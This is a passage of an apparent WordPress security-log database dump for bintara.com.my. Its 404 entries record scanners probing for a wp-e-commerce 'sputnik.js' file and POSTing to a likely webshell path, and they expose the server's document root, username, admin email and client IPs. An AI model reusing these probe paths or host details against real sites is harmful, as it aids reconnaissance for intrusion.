ERVER_PROTOCOL\";s:8:\"HTTP/1.0\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XaY@zKJ3enRcCPZdox7t8wAAAcQ\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571176140.9177\";s:12:\"REQUEST_TIME\";s:10:\"1571176140\";}}','notice','2019-10-15 21:49:03','2019-10-15 21:49:01',35459064,37266832,'https://bintara.com.my/?page_id=11',1,0,'171.22.252.66'),(28087,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:92:\"/test/wp-content/plugins/wp-e-commerce/wpsc-components/marketplace-core-v1/static/sputnik.js\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:8:\"identity\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:108:\"Mozilla/5.1 (Windows NT 6.0; WOW64) AppleWebKit/533.36 (KHTML, like Gecko) Chrome/46.0.2754.75 Safari/533.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:114:\"https://bintara.com.my/test/wp-content/plugins/wp-e-commerce/wpsc-components/marketplace-core-v1/static/sputnik.js\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:92:\"/test/wp-content/plugins/wp-e-commerce/wpsc-components/marketplace-core-v1/static/sputnik.js\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"403\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XaY7ka@51JdM-xtx2nJFdwAAAYU\";s:19:\"REDIRECT_SCRIPT_URI\";s:114:\"https://bintara.com.my/test/wp-content/plugins/wp-e-commerce/wpsc-components/marketplace-core-v1/static/sputnik.js\";s:19:\"REDIRECT_SCRIPT_URL\";s:92:\"/test/wp-content/plugins/wp-e-commerce/wpsc-components/marketplace-core-v1/static/sputnik.js\";s:15:\"REDIRECT_STATUS\";s:3:\"403\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XaY7ka@51JdM-xtx2nJFdwAAAYU\";s:12:\"REDIRECT_URL\";s:10:\"/403.shtml\";s:11:\"REMOTE_ADDR\";s:12:\"45.55.152.56\";s:11:\"REMOTE_PORT\";s:5:\"34320\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:114:\"https://bintara.com.my/test/wp-content/plugins/wp-e-commerce/wpsc-components/marketplace-core-v1/static/sputnik.js\";s:10:\"SCRIPT_URL\";s:92:\"/test/wp-content/plugins/wp-e-commerce/wpsc-components/marketplace-core-v1/static/sputnik.js\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"XaY7ka@51JdM-xtx2nJFdwAAAYU\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571175313.9953\";s:12:\"REQUEST_TIME\";s:10:\"1571175313\";}}','notice','2019-10-15 21:35:16','2019-10-15 21:35:14',35676904,37478912,'https://bintara.com.my/test/wp-content/plugins/wp-e-commerce/wpsc-components/marketplace-core-v1/static/sputnik.js',1,0,'45.55.152.56'),(28054,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:83:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:60:\"/wp-cron.php?doing_wp_cron=1571137402.7104690074920654296875\";s:14:\"CONTENT_LENGTH\";s:1:\"0\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"deflate, gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:82:\"https://bintara.com.my/wp-cron.php?doing_wp_cron=1571137402.7104690074920654296875\";s:15:\"HTTP_USER_AGENT\";s:39:\"WordPress/5.1.3; https://bintara.com.my\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_CONTENT_LENGTH\";s:1:\"0\";s:30:\"REDIRECT_REDIRECT_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:39:\"REDIRECT_REDIRECT_CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:32:\"REDIRECT_REDIRECT_CONTEXT_PREFIX\";s:0:\"\";s:31:\"REDIRECT_REDIRECT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:29:\"REDIRECT_REDIRECT_ERROR_NOTES\";s:54:\"Script timed out before returning headers: wp-cron.php\";s:35:\"REDIRECT_REDIRECT_GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:23:\"REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:29:\"REDIRECT_REDIRECT_HTTP_ACCEPT\";s:3:\"*/*\";s:38:\"REDIRECT_REDIRECT_HTTP_ACCEPT_ENCODING\";s:13:\"deflate, gzip\";s:33:\"REDIRECT_REDIRECT_HTTP_CONNECTION\";s:5:\"close\";s:27:\"REDIRECT_REDIRECT_HTTP_HOST\";s:14:\"bintara.com.my\";s:30:\"REDIRECT_REDIRECT_HTTP_REFERER\";s:82:\"https://bintara.com.my/wp-cron.php?doing_wp_cron=1571137402.7104690074920654296875\";s:33:\"REDIRECT_REDIRECT_HTTP_USER_AGENT\";s:39:\"WordPress/5.1.3; https://bintara.com.my\";s:30:\"REDIRECT_REDIRECT_HTTP_X_HTTPS\";s:1:\"1\";s:22:\"REDIRECT_REDIRECT_PATH\";s:29:\"/sbin:/usr/sbin:/bin:/usr/bin\";s:30:\"REDIRECT_REDIRECT_QUERY_STRING\";s:47:\"doing_wp_cron=1571137402.7104690074920654296875\";s:29:\"REDIRECT_REDIRECT_REMOTE_ADDR\";s:12:\"103.6.198.69\";s:29:\"REDIRECT_REDIRECT_REMOTE_PORT\";s:5:\"33330\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:4:\"POST\";s:32:\"REDIRECT_REDIRECT_REQUEST_SCHEME\";s:5:\"https\";s:29:\"REDIRECT_REDIRECT_REQUEST_URI\";s:60:\"/wp-cron.php?doing_wp_cron=1571137402.7104690074920654296875\";s:33:\"REDIRECT_REDIRECT_SCRIPT_FILENAME\";s:52:\"/home/norfaiz/public_html/bintara.com.my/wp-cron.php\";s:29:\"REDIRECT_REDIRECT_SCRIPT_NAME\";s:12:\"/wp-cron.php\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:34:\"https://bintara.com.my/wp-cron.php\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:12:\"/wp-cron.php\";s:29:\"REDIRECT_REDIRECT_SERVER_ADDR\";s:12:\"103.6.198.69\";s:30:\"REDIRECT_REDIRECT_SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:29:\"REDIRECT_REDIRECT_SERVER_NAME\";s:14:\"bintara.com.my\";s:29:\"REDIRECT_REDIRECT_SERVER_PORT\";s:3:\"443\";s:33:\"REDIRECT_REDIRECT_SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:34:\"REDIRECT_REDIRECT_SERVER_SIGNATURE\";s:0:\"\";s:33:\"REDIRECT_REDIRECT_SERVER_SOFTWARE\";s:6:\"Apache\";s:29:\"REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"500\";s:29:\"REDIRECT_REDIRECT_SUPHP_GROUP\";s:7:\"norfaiz\";s:31:\"REDIRECT_REDIRECT_SUPHP_HANDLER\";s:28:\"application/x-httpd-ea-php56\";s:28:\"REDIRECT_REDIRECT_SUPHP_USER\";s:7:\"norfaiz\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XaWnenOdAnWdgCw5cMixVQAAAAM\";s:19:\"REDIRECT_SCRIPT_URI\";s:34:\"https://bintara.com.my/wp-cron.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:12:\"/wp-cron.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"500\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XaWnenOdAnWdgCw5cMixVQAAAAM\";s:12:\"REDIRECT_URL\";s:10:\"/500.shtml\";s:11:\"REMOTE_ADDR\";s:12:\"103.6.198.69\";s:11:\"REMOTE_PORT\";s:5:\"33330\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:34:\"https://bintara.com.my/wp-cron.php\";s:10:\"SCRIPT_URL\";s:12:\"/wp-cron.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XaWnenOdAnWdgCw5cMixVQAAAAM\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571138311.3219\";s:12:\"REQUEST_TIME\";s:10:\"1571138311\";}}','notice','2019-10-15 11:18:41','2019-10-15 11:18:33',35057096,35309264,'https://bintara.com.my/wp-cron.php?doing_wp_cron=1571137402.7104690074920654296875',1,0,'103.6.198.69'),(28055,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:12:\"/?page_id=18\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:103:\"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:10:\"page_id=18\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:12:\"23.83.90.249\";s:11:\"REMOTE_PORT\";s:5:\"39717\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:23:\"https://bintara.com.my/\";s:10:\"SCRIPT_URL\";s:1:\"/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.0\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XaWw9HOdAnWdgCw5cMi2OQAAAAM\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571139832.3901\";s:12:\"REQUEST_TIME\";s:10:\"1571139832\";}}','notice','2019-10-15 11:44:09','2019-10-15 11:43:55',35434192,37243016,'https://bintara.com.my/?page_id=18',1,0,'23.83.90.249'),(28056,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:12:\"/?page_id=18\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:105:\"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.104 Safari/537.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:10:\"page_id=18\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:15:\"108.161.133.165\";s:11:\"REMOTE_PORT\";s:5:\"55793\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:23:\"https://bintara.com.my/\";s:10:\"SCRIPT_URL\";s:1:\"/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XaWy-nOdAnWdgCw5cMi3WwAAABY\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571140350.5428\";s:12:\"REQUEST_TIME\";s:10:\"1571140350\";}}','notice','2019-10-15 11:52:33','2019-10-15 11:52:30',35425808,37234216,'https://bintara.com.my/?page_id=18',1,0,'108.161.133.165'),(28057,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:95:\"/staging/wp-content/plugins/wp-e-commerce/wpsc-components/marketplace-core-v1/static/sputnik.js\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:8:\"identity\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:108:\"Mozilla/5.1 (Windows NT 6.0; WOW64) AppleWebKit/533.36 (KHTML, like Gecko) Chrome/46.0.2754.75 Safari/533.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:117:\"https://bintara.com.my/staging/wp-content/plugins/wp-e-commerce/wpsc-components/marketplace-core-v1/static/sputnik.js\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:95:\"/staging/wp-content/plugins/wp-e-commerce/wpsc-components/marketplace-core-v1/static/sputnik.js\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"403\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XaWzMPs3ai5mz5uo0hUKYgAAAEg\";s:19:\"REDIRECT_SCRIPT_URI\";s:117:\"https://bintara.com.my/staging/wp-content/plugins/wp-e-commerce/wpsc-components/marketplace-core-v1/static/sputnik.js\";s:19:\"REDIRECT_SCRIPT_URL\";s:95:\"/staging/wp-content/plugins/wp-e-commerce/wpsc-components/marketplace-core-v1/static/sputnik.js\";s:15:\"REDIRECT_STATUS\";s:3:\"403\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XaWzMPs3ai5mz5uo0hUKYgAAAEg\";s:12:\"REDIRECT_URL\";s:10:\"/403.shtml\";s:11:\"REMOTE_ADDR\";s:15:\"128.199.194.131\";s:11:\"REMOTE_PORT\";s:5:\"29228\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:117:\"https://bintara.com.my/staging/wp-content/plugins/wp-e-commerce/wpsc-components/marketplace-core-v1/static/sputnik.js\";s:10:\"SCRIPT_URL\";s:95:\"/staging/wp-content/plugins/wp-e-commerce/wpsc-components/marketplace-core-v1/static/sputnik.js\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"XaWzMPs3ai5mz5uo0hUKYgAAAEg\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571140400.9244\";s:12:\"REQUEST_TIME\";s:10:\"1571140400\";}}','notice','2019-10-15 11:53:22','2019-10-15 11:53:21',35283504,37082512,'https://bintara.com.my/staging/wp-content/plugins/wp-e-commerce/wpsc-components/marketplace-core-v1/static/sputnik.js',1,0,'128.199.194.131'),(28058,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:50:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-conde.php\";s:14:\"CONTENT_LENGTH\";s:2:\"28\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:114:\"Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:23:\"REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:4:\"POST\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-conde.php\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:13:\"/wp-conde.php\";s:29:\"REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"404\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XaW2OHOdAnWdgCw5cMi4rQAAAAU\";s:19:\"REDIRECT_SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-conde.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:13:\"/wp-conde.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"404\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XaW2OHOdAnWdgCw5cMi4rQAAAAU\";s:12:\"REDIRECT_URL\";s:10:\"/404.shtml\";s:11:\"REMOTE_ADDR\";s:13:\"193.106.30.99\";s:11:\"REMOTE_PORT\";s:5:\"35954\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-conde.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-conde.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XaW2OHOdAnWdgCw5cMi4rQAAAAU\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571141176.8974\";s:12:\"REQUEST_TIME\";s:10:\"1571141176\";}}','notice','2019-10-15 12:06:20','2019-10-15 12:06:17',35424048,37231104,'https://bintara.com.my/wp-conde.php',1,0,'193.106.30.99'),(28059,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:46:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:94:\"/portal/wp-content/plugins/wp-e-commerce/wpsc-components/marketplace-core-v1/static/sputnik.js\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:8:\"identity\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:108:\"Mozilla/5.1 (Windows NT 6.0; WOW64) AppleWebKit/533.36 (KHTML, like Gecko) Chrome/46.0.2754.75 Safari/533.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:116:\"https://bintara.com.my/portal/wp-content/plugins/wp-e-commerce/wpsc-components/marketplace-core-v1/static/sputnik.js\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:94:\"/portal/wp-content/plugins/wp-e-commerce/wpsc-components/marketplace-core-v1/static/sputnik.js\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"403\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XaW8YPs3ai5mz5uo0hUMZwAAAE4\";s:19:\"REDIRECT_SCRIPT_URI\";s:116:\"https://bintara.com.my/portal/wp-content/plugins/wp-e-commerce/wpsc-components/marketplace-core-v1/static/sputnik.js\";s:19:\"REDIRECT_SCRIPT_URL\";s:94:\"/portal/wp-content/plugins/wp-e-commerce/wpsc-components/marketplace-core-v1/static/sputnik.js\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"403\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XaW8YPs3ai5mz5uo0hUMZwAAAE4\";s:12:\"REDIRECT_URL\";s:10:\"/403.shtml\";s:11:\"REMOTE_ADDR\";s:14:\"159.65.162.186\";s:11:\"REMOTE_PORT\";s:5:\"55872\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:116:\"https://bintara.com.my/portal/wp-content/plugins/wp-e-commerce/wpsc-components/marketplace-core-v1/static/sputnik.js\";s:10:\"SCRIPT_URL\";s:94:\"/portal/wp-content/plugins/wp-e-commerce/wpsc-components/marketplace-core-v1/static/sputnik.js\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XaW8YPs3ai5mz5uo0hUMZwAAAE4\";s:8:\"P